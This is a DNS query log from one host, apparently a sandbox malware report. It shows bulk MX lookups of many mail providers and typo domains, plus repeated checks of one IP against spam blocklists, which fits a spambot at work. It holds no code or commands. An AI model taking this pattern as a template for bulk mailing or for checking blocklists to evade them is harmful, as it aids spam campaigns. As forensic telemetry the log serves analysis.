Sep 5, 2021 15:51:21.256351948 CEST	192.168.2.4	8.8.8.8	0x4349	Standard query (0)	smtp-in.sfr.fr	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.264504910 CEST	192.168.2.4	8.8.8.8	0x545c	Standard query (0)	prodigy.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:21.366384029 CEST	192.168.2.4	8.8.8.8	0x9472	Standard query (0)	al-ip4-mx-vip2.prodigy.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.372112989 CEST	192.168.2.4	8.8.8.8	0x4530	Standard query (0)	mx2.naver.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.372495890 CEST	192.168.2.4	8.8.8.8	0xeadd	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.439460039 CEST	192.168.2.4	8.8.8.8	0x9dbc	Standard query (0)	mx.tlen.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:21.604420900 CEST	192.168.2.4	8.8.8.8	0xe812	Standard query (0)	windowslive.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:21.690618992 CEST	192.168.2.4	8.8.8.8	0x5f28	Standard query (0)	nam.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.294423103 CEST	192.168.2.4	8.8.8.8	0xbaac	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.297883987 CEST	192.168.2.4	8.8.8.8	0x3db2	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.555207968 CEST	192.168.2.4	8.8.8.8	0xe7b5	Standard query (0)	fourr.org	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:22.727335930 CEST	192.168.2.4	8.8.8.8	0x50cc	Standard query (0)	mx37.mb5p.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.775063038 CEST	192.168.2.4	8.8.8.8	0x65b5	Standard query (0)	emig.freenet.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.778791904 CEST	192.168.2.4	8.8.8.8	0x5c1f	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:22.960238934 CEST	192.168.2.4	8.8.8.8	0x64b1	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:23.824703932 CEST	192.168.2.4	8.8.8.8	0x5733	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:23.826659918 CEST	192.168.2.4	8.8.8.8	0x5e07	Standard query (0)	mx1.comcast.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:23.827038050 CEST	192.168.2.4	8.8.8.8	0x7084	Standard query (0)	bol.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:23.890872955 CEST	192.168.2.4	8.8.8.8	0x6c17	Standard query (0)	pro-mail-mx-003.bol.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:24.266030073 CEST	192.168.2.4	8.8.8.8	0xb0b6	Standard query (0)	www.instagram.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:24.692953110 CEST	192.168.2.4	8.8.8.8	0x3044	Standard query (0)	mx.lb.btinternet.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:24.942760944 CEST	192.168.2.4	8.8.8.8	0x5a82	Standard query (0)	smtp-in.sfr.fr	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:25.139209986 CEST	192.168.2.4	8.8.8.8	0x51cd	Standard query (0)	mx.poczta.onet.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:25.757960081 CEST	192.168.2.4	8.8.8.8	0xb219	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:25.797926903 CEST	192.168.2.4	8.8.8.8	0x309f	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:25.848226070 CEST	192.168.2.4	8.8.8.8	0xd8dc	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:25.912838936 CEST	192.168.2.4	8.8.8.8	0x6d96	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:25.984206915 CEST	192.168.2.4	8.8.8.8	0x6e28	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.051268101 CEST	192.168.2.4	8.8.8.8	0x3c47	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.054573059 CEST	192.168.2.4	8.8.8.8	0x80de	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.094398975 CEST	192.168.2.4	8.8.8.8	0xf496	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.153625011 CEST	192.168.2.4	8.8.8.8	0x473e	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.198816061 CEST	192.168.2.4	8.8.8.8	0x9b4	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:26.250600100 CEST	192.168.2.4	8.8.8.8	0x65c5	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.332715034 CEST	192.168.2.4	8.8.8.8	0xe5f3	Standard query (0)	www.instagram.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.333437920 CEST	192.168.2.4	8.8.8.8	0x2485	Standard query (0)	vip.qq.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:27.380804062 CEST	192.168.2.4	8.8.8.8	0x89f2	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.922899008 CEST	192.168.2.4	8.8.8.8	0xb946	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:27.923630953 CEST	192.168.2.4	8.8.8.8	0x7768	Standard query (0)	myfrontiermail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:27.960386038 CEST	192.168.2.4	8.8.8.8	0xf080	Standard query (0)	mta7.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:28.125986099 CEST	192.168.2.4	8.8.8.8	0xed97	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:28.724601984 CEST	192.168.2.4	8.8.8.8	0x88a7	Standard query (0)	mx2.naver.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:28.726617098 CEST	192.168.2.4	8.8.8.8	0x1969	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:29.660621881 CEST	192.168.2.4	8.8.8.8	0x8994	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:29.979196072 CEST	192.168.2.4	8.8.8.8	0xca01	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.682310104 CEST	192.168.2.4	8.8.8.8	0x2f6f	Standard query (0)	walla.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:30.729796886 CEST	192.168.2.4	8.8.8.8	0xdf62	Standard query (0)	mx1.hc49497.c3s2.iphmx.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.841924906 CEST	192.168.2.4	8.8.8.8	0x445a	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:30.961620092 CEST	192.168.2.4	8.8.8.8	0xe045	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.105685949 CEST	192.168.2.4	8.8.8.8	0x6b84	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.105755091 CEST	192.168.2.4	8.8.8.8	0x5b59	Standard query (0)	mx2.naver.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.714948893 CEST	192.168.2.4	8.8.8.8	0xbec0	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.716804981 CEST	192.168.2.4	8.8.8.8	0x38f8	Standard query (0)	mx2.naver.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:31.772146940 CEST	192.168.2.4	8.8.8.8	0x242b	Standard query (0)	yahoo.co.in	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:31.820749044 CEST	192.168.2.4	8.8.8.8	0xcd01	Standard query (0)	mx-apac.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.213356972 CEST	192.168.2.4	8.8.8.8	0x4b44	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:32.717595100 CEST	192.168.2.4	8.8.8.8	0x56b3	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:33.132714987 CEST	192.168.2.4	8.8.8.8	0x4452	Standard query (0)	emig.freenet.de	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:33.286037922 CEST	192.168.2.4	8.8.8.8	0x8d0e	Standard query (0)	mx.tlen.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:33.443238020 CEST	192.168.2.4	8.8.8.8	0x92b8	Standard query (0)	orange.pl	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:33.589171886 CEST	192.168.2.4	8.8.8.8	0x102a	Standard query (0)	smtp-in.hosting.orange.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:33.799767971 CEST	192.168.2.4	8.8.8.8	0xa210	Standard query (0)	wp.eu	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:33.847359896 CEST	192.168.2.4	8.8.8.8	0xcf87	Standard query (0)	mx.wp.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.001501083 CEST	192.168.2.4	8.8.8.8	0x6b6b	Standard query (0)	mx.wp.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.144491911 CEST	192.168.2.4	8.8.8.8	0x47a	Standard query (0)	gamil.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:34.200351000 CEST	192.168.2.4	8.8.8.8	0xac2e	Standard query (0)	mail.gamil.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.203685045 CEST	192.168.2.4	8.8.8.8	0x91a4	Standard query (0)	bigpond.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:34.245340109 CEST	192.168.2.4	8.8.8.8	0x7b2	Standard query (0)	extmail.bigpond.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.478223085 CEST	192.168.2.4	8.8.8.8	0x95e0	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:34.513533115 CEST	192.168.2.4	8.8.8.8	0x5bd	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.678448915 CEST	192.168.2.4	8.8.8.8	0xb439	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.681432009 CEST	192.168.2.4	8.8.8.8	0x7755	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.683656931 CEST	192.168.2.4	8.8.8.8	0xdf43	Standard query (0)	extmail.bigpond.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.687028885 CEST	192.168.2.4	8.8.8.8	0xf681	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.731493950 CEST	192.168.2.4	8.8.8.8	0x9b0d	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.807544947 CEST	192.168.2.4	8.8.8.8	0xb135	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.858876944 CEST	192.168.2.4	8.8.8.8	0x34f7	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.901459932 CEST	192.168.2.4	8.8.8.8	0xc60b	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:35.953922033 CEST	192.168.2.4	8.8.8.8	0x55c2	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.017271996 CEST	192.168.2.4	8.8.8.8	0xfe33	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.061531067 CEST	192.168.2.4	8.8.8.8	0xbd09	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.108763933 CEST	192.168.2.4	8.8.8.8	0x92c8	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.259850025 CEST	192.168.2.4	84.200.69.80	0x300	Standard query (0)	41.52.17.84.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 5, 2021 15:51:36.261847019 CEST	192.168.2.4	8.8.8.8	0xf632	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.379508972 CEST	192.168.2.4	8.8.8.8	0x98b5	Standard query (0)	extmail.bigpond.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.389045954 CEST	192.168.2.4	8.8.8.8	0xaddc	Standard query (0)	lycos.de	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:36.523969889 CEST	192.168.2.4	8.8.8.8	0x8a14	Standard query (0)	mx.lycos.de.cust.b.hostedemail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.624125004 CEST	192.168.2.4	8.8.8.8	0x513e	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.639233112 CEST	192.168.2.4	8.8.8.8	0x88d2	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.824929953 CEST	192.168.2.4	8.8.8.8	0x7959	Standard query (0)	extmail.bigpond.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:36.884243011 CEST	192.168.2.4	8.8.8.8	0xfe3d	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.120515108 CEST	192.168.2.4	8.8.8.8	0xb062	Standard query (0)	cxr.mx.a.cloudfilter.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.551729918 CEST	192.168.2.4	8.8.8.8	0x83d4	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.557380915 CEST	192.168.2.4	8.8.8.8	0x4ec3	Standard query (0)	orange.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:37.597641945 CEST	192.168.2.4	8.8.8.8	0x16c0	Standard query (0)	custmx.cscdns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.610528946 CEST	192.168.2.4	8.8.8.8	0x8dc3	Standard query (0)	rogers.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:37.694231033 CEST	192.168.2.4	8.8.8.8	0xed8d	Standard query (0)	mx-rogers.mail.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:37.989567995 CEST	192.168.2.4	8.8.8.8	0x8a	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.196093082 CEST	192.168.2.4	8.8.8.8	0x913d	Standard query (0)	sky.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:38.238468885 CEST	192.168.2.4	8.8.8.8	0xf6cf	Standard query (0)	mx-eu.mail.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.267414093 CEST	192.168.2.4	8.8.8.8	0xb464	Standard query (0)	mail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:38.315885067 CEST	192.168.2.4	8.8.8.8	0x4529	Standard query (0)	mx00.mail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.598918915 CEST	192.168.2.4	8.8.8.8	0x1a33	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:38.662076950 CEST	192.168.2.4	8.8.8.8	0xdeb	Standard query (0)	mx-eu.mail.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.144150019 CEST	192.168.2.4	8.8.8.8	0xc25e	Standard query (0)	al-ip4-mx-vip2.prodigy.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.147252083 CEST	192.168.2.4	8.8.8.8	0x2358	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.155227900 CEST	192.168.2.4	8.8.8.8	0xa60	Standard query (0)	horsebarninfo.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:39.276187897 CEST	192.168.2.4	8.8.8.8	0xabf6	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.700628996 CEST	192.168.2.4	8.8.8.8	0x708d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:39.986505032 CEST	192.168.2.4	8.8.8.8	0x197a	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.104590893 CEST	192.168.2.4	8.8.8.8	0xf3c6	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.131730080 CEST	192.168.2.4	8.8.8.8	0x698d	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.362696886 CEST	192.168.2.4	8.8.8.8	0x6ad6	Standard query (0)	castec.dk	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:41.459770918 CEST	192.168.2.4	8.8.8.8	0xa5b8	Standard query (0)	ALT2.ASPMX.L.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:41.551026106 CEST	192.168.2.4	8.8.8.8	0x87bd	Standard query (0)	e-garfield.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:41.694633007 CEST	192.168.2.4	8.8.8.8	0xa368	Standard query (0)	mx37.mb5p.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:42.269577026 CEST	192.168.2.4	8.8.8.8	0x4926	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.249203920 CEST	192.168.2.4	8.8.8.8	0xac5f	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.255718946 CEST	192.168.2.4	8.8.8.8	0x6e50	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.476567984 CEST	192.168.2.4	8.8.8.8	0xbdff	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.761781931 CEST	192.168.2.4	8.8.8.8	0x24e0	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.809206963 CEST	192.168.2.4	8.8.8.8	0xd5d2	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.883430004 CEST	192.168.2.4	8.8.8.8	0x39ae	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:44.929183006 CEST	192.168.2.4	8.8.8.8	0x2c50	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.038959980 CEST	192.168.2.4	8.8.8.8	0x813	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.063870907 CEST	192.168.2.4	8.8.8.8	0x6c4e	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.103040934 CEST	192.168.2.4	8.8.8.8	0x811b	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.150356054 CEST	192.168.2.4	8.8.8.8	0x5f29	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.192678928 CEST	192.168.2.4	8.8.8.8	0x831d	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.399419069 CEST	192.168.2.4	8.8.8.8	0x15f9	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.405872107 CEST	192.168.2.4	8.8.8.8	0xbd9f	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:45.439717054 CEST	192.168.2.4	8.8.8.8	0xf0fe	Standard query (0)	41.52.17.84.cbl.abuseat.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:46.065279007 CEST	192.168.2.4	8.8.8.8	0x8179	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.049988031 CEST	192.168.2.4	8.8.8.8	0x5440	Standard query (0)	shinnemo.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:47.102504969 CEST	192.168.2.4	8.8.8.8	0x8fcb	Standard query (0)	mail.mailerhost.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.111769915 CEST	192.168.2.4	8.8.8.8	0xaafa	Standard query (0)	mail.org	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:47.114283085 CEST	192.168.2.4	8.8.8.8	0x6582	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.172647953 CEST	192.168.2.4	8.8.8.8	0xfa77	Standard query (0)	mx00.mail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.174299002 CEST	192.168.2.4	8.8.8.8	0x4bf9	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:47.490509033 CEST	192.168.2.4	8.8.8.8	0x8dae	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:49.399326086 CEST	192.168.2.4	8.8.8.8	0xa62c	Standard query (0)	verizon.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:49.637923002 CEST	192.168.2.4	8.8.8.8	0x2d3e	Standard query (0)	mx-aol.mail.gm0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.326097965 CEST	192.168.2.4	8.8.8.8	0xf2b9	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.334582090 CEST	192.168.2.4	8.8.8.8	0xe755	Standard query (0)	xamog.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:50.450921059 CEST	192.168.2.4	8.8.8.8	0xd5cc	Standard query (0)	mx.powered.name	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.706417084 CEST	192.168.2.4	8.8.8.8	0x763e	Standard query (0)	mx.tlen.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.822777987 CEST	192.168.2.4	8.8.8.8	0xeceb	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:50.840578079 CEST	192.168.2.4	8.8.8.8	0xd7c1	Standard query (0)	wi.rr.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:50.929723024 CEST	192.168.2.4	8.8.8.8	0xa63a	Standard query (0)	pkvw-mx.msg.pkvw.co.charter.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:51.117778063 CEST	192.168.2.4	8.8.8.8	0x8204	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:51.516330957 CEST	192.168.2.4	8.8.8.8	0xd67a	Standard query (0)	smtp.yopmail.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:51.931478977 CEST	192.168.2.4	8.8.8.8	0x76ac	Standard query (0)	ymail.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:51.978599072 CEST	192.168.2.4	8.8.8.8	0x8d57	Standard query (0)	mta7.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.044106960 CEST	192.168.2.4	8.8.8.8	0xf6ff	Standard query (0)	outlook.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:52.113934994 CEST	192.168.2.4	8.8.8.8	0x3b1b	Standard query (0)	outlook-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.114691019 CEST	192.168.2.4	8.8.8.8	0x9ed	Standard query (0)	mx.interia.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.567182064 CEST	192.168.2.4	8.8.8.8	0xf7fc	Standard query (0)	mx01.emig.gmx.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.902426958 CEST	192.168.2.4	8.8.8.8	0xe8c4	Standard query (0)	mx.tlen.pl	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:52.932719946 CEST	192.168.2.4	8.8.8.8	0xab84	Standard query (0)	asdooeemail.net	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:52.983351946 CEST	192.168.2.4	8.8.8.8	0xa4e7	Standard query (0)	mx4.beavis99.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:53.041307926 CEST	192.168.2.4	8.8.8.8	0x88b9	Standard query (0)	o3enzyme.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:53.114183903 CEST	192.168.2.4	8.8.8.8	0x5f17	Standard query (0)	mxb.mailgun.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:53.971590996 CEST	192.168.2.4	8.8.8.8	0xc6d2	Standard query (0)	microsoft-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.397517920 CEST	192.168.2.4	8.8.8.8	0x1b0b	Standard query (0)	mta6.am0.yahoodns.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:54.399544001 CEST	192.168.2.4	8.8.8.8	0x77a	Standard query (0)	al-ip4-mx-vip2.prodigy.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:55.272824049 CEST	192.168.2.4	8.8.8.8	0x1631	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.250339031 CEST	192.168.2.4	8.8.8.8	0xc415	Standard query (0)	villageautogroup.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:56.259047985 CEST	192.168.2.4	8.8.8.8	0x68b6	Standard query (0)	41.52.17.84.dnsbl.sorbs.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.315550089 CEST	192.168.2.4	8.8.8.8	0x1787	Standard query (0)	mx.sendgrid.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.316643000 CEST	192.168.2.4	8.8.8.8	0xfdc1	Standard query (0)	gmeil.com	MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:56.317082882 CEST	192.168.2.4	8.8.8.8	0x2b61	Standard query (0)	alt1.gmail-smtp-in.l.google.com	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.320871115 CEST	192.168.2.4	8.8.8.8	0x817a	Standard query (0)	41.52.17.84.bl.spamcop.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.363878965 CEST	192.168.2.4	8.8.8.8	0x263a	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.363946915 CEST	192.168.2.4	8.8.8.8	0xc041	Standard query (0)	41.52.17.84.zen.spamhaus.org	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:56.416968107 CEST	192.168.2.4	8.8.8.8	0x3d00	Standard query (0)	41.52.17.84.sbl-xbl.spamhaus.org	A (IP address)	IN (0x0001)
